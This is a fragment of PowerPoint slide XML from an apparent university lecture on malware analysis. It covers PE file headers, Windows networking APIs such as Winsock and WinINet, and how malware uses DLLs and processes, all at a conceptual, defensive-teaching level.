            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294989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1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>is a DWORD(4 bytes) containing the value 50h, 45h, 00h, 00h (“PE” followed by two terminating zeroes).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>FileHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="120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(IMAGE_FILE_HEADER) is the next 20 bytes of the PE file and contains info about the physical layout &amp; properties of the file e.g. number of sections.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OptionalHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="120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(IMAGE_OPTIONAL_HEADERS) is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file with fields like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AddressOfEntryPoint</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ImageBase</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FileAlignment</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SectionAlignment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> etc. The last 128 bytes contains the Data Directory which is an array of 16 IMAGE_DATA_DIRECTORY structures.</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173838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Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Machine:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t> i386,486,586 (0x14c)</a:t>
            </a:r>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11879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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595306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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50442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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113281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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194738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C004B57-344B-4127-95E0-C4D70C1DB92C}"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26001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004B57-344B-4127-95E0-C4D70C1DB92C}"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37880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004B57-344B-4127-95E0-C4D70C1DB92C}"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239721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24744"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8784976" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3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CC004B57-344B-4127-95E0-C4D70C1DB92C}"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414962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04B57-344B-4127-95E0-C4D70C1DB92C}"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50623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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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29476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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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58309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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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401228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04B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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96786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04B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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180102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04B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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103790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9512" y="274638"/>
            <a:ext cx="8784976"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07504" y="1600200"/>
            <a:ext cx="892899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04B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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9032E-7B51-4E15-9222-EB0F43ABC83B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302743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fireeye.com/services/freeware/apatedns.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inetsim.or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mailto:sontt@viethanit.edu.v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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dr.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Tran The Son</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Korea – Vietnam Friendship IT College</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953715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Botnet</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3" y="1196752"/>
            <a:ext cx="9063360" cy="528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00992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API</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Windows API functions for network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Berkeley compatible sockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: implemented in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the Winsock libraries, primarily in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>ws2_32.dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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96164"/>
            <a:ext cx="7556300" cy="2880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9326" y="5661248"/>
            <a:ext cx="8729952" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WSAStartup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>function must be called before any other networking functions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>order to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allocate resources for the networking libraries. When looking for the start of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>network connections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>while debugging code, it is useful to set a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WSAStartup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>because the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start of networking should follow shortly.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16708501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Networking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>API (Code Example)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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196752"/>
            <a:ext cx="5040560" cy="550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1237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Networking API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>WinINet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Higher-level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>tored in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Wininet.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>protocols, such as HTTP and FTP, at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>the application layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetOpen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is used to initialize a connection to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetOpenUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is used to connect to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetReadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>read the data from a file downloaded from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234593968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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A DLL is an executable file that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>run alone, but exports functions that can be used by other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malware writers use DLLs in three ways</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>To store malicious code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By using Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By using third-party DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Basic DLL Structure: </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>DLLs use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>PE file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and only a single flag indicates that the file is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>DLLs often have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>more exports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and generally fewer imports</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953940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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>rocess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malware can also execute code outside the current program by creating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>new process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>modifying an existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A process contains one or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> that are executed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>by the CPU.</a:t>
            </a:r>
          </a:p>
          <a:p>
